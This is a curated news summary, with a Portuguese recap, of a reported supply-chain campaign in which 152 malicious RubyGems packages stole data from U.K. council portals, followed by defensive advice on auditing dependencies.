Hackers uploaded 150+ fake RubyGems packages to steal data from U.K. council websites, not to hack developers.
- Hackers uploaded 152 fake RubyGems packages to steal data from U.K. council portals
- The GemStuffer campaign avoided malware to focus on data exfiltration instead
- Most packages had almost no downloads, suggesting targeted attacks on specific portals
Security firm Socket first spotted the GemStuffer campaign after scanning the RubyGems registry for suspicious packages. They found 152 gems designed not to spread malware, but to quietly scrape and exfiltrate data from U.K. local council web portals. Unlike typical supply-chain attacks, these packages didn’t try to infect developers’ machines. Instead, they acted as data mules, pulling information from the sites where they were installed and sending it back to attacker-controlled servers.
The packages looked harmless at first glance. Many had no downloads or just a handful, suggesting they weren’t meant for mass compromise. Instead, they targeted specific council portals that used Ruby libraries. Once installed, the gems would scrape user inputs, session data, or other sensitive details and transmit them to external domains controlled by the attackers. Socket noted the payloads were repetitive—each package used similar obfuscation techniques and command-and-control infrastructure.
How the attack slipped through the cracks
RubyGems, like other package registries, relies on automated scans to catch malicious uploads. But GemStuffer’s approach avoided many red flags. The packages didn’t include executable code that could trigger alerts. Instead, they used legitimate-looking dependencies and included subtle hooks to activate the data-stealing logic only when certain conditions were met—like detecting a specific council portal URL.
Experts say this tactic mirrors a shift in cybercrime. Hackers are moving away from noisy malware campaigns toward quiet data theft. By reusing the same obfuscation methods across multiple packages, the attackers made detection harder. Socket’s report highlights that even small, low-activity packages can be part of a larger operation if they’re dropped into the right environment.
Who’s at risk and what’s next
The primary targets appear to be U.K. local councils, which often host portals for services like housing, benefits, and planning applications. These sites process sensitive personal data, making them attractive to cybercriminals. While the full scope of the breach isn’t clear, the use of 152 separate packages suggests a coordinated effort to target multiple councils at once.
RubyGems has already removed the malicious packages after being alerted by Socket. But the incident raises questions about how package registries can better detect subtle abuse. Some security teams argue registries need stricter vetting, especially for packages that look inactive or have niche uses. Others point to the need for better detection at the application level—councils should audit third-party libraries more closely.
For developers, the lesson is simple: even seemingly harmless packages can carry hidden risks. Always check dependencies, monitor network traffic, and use tools like Socket or Dependabot to catch unusual behavior. The GemStuffer campaign proves that attackers don’t need flashy malware to do damage—they just need access.
What You Need to Know
- Source: The Hacker News
- Published: May 13, 2026 at 08:08 UTC
- Category: Security
- Topics: #hackernews · #security · #vulnerabilities · #cybersecurity · #stuffer-abuses · #ruby
Read the Full Story
This is a curated summary. For the complete article, original data, quotes and full analysis:
All reporting rights belong to the respective author(s) at The Hacker News. GlobalBR News summarizes publicly available content to help readers discover the most relevant global news.
Curated by GlobalBR News · May 13, 2026
🇧🇷 Resumo em Português
Cibercriminosos estão usando uma técnica sofisticada para roubar dados sensíveis de portais de governos locais britânicos, enganando desenvolvedores e até sistemas de segurança com mais de 150 pacotes falsos no RubyGems, repositório de bibliotecas para a linguagem Ruby. A descoberta, feita por pesquisadores de segurança, expõe como invasores estão cada vez mais se infiltrando em cadeias de suprimentos de software para ataques direcionados, um risco que não poupa nem mesmo instituições públicas no exterior.
No Brasil, onde a adoção de linguagens como Ruby e frameworks baseados em JavaScript cresce no setor público e privado, o caso serve como um alerta sobre a vulnerabilidade das cadeias de desenvolvimento. Muitas organizações ainda subestimam os riscos de pacotes de terceiros, que podem conter código malicioso capaz de extrair informações confidenciais ou até mesmo implantar backdoors. Especialistas brasileiros já haviam mapeado casos semelhantes, como a contaminação de bibliotecas npm por malwares em projetos governamentais e corporativos, reforçando a necessidade de auditorias rigorosas e ferramentas automatizadas de detecção.
A Polícia Federal e a ANPD (Autoridade Nacional de Proteção de Dados) devem acelerar a elaboração de diretrizes específicas para mitigar esses riscos, enquanto empresas e órgãos públicos são instados a revisar urgentemente seus sistemas em busca de pacotes suspeitos.
The Hacker News
Read full article at The Hacker News →This post is a curated summary. All rights belong to the original author(s) and The Hacker News.
Was this article helpful?
Discussion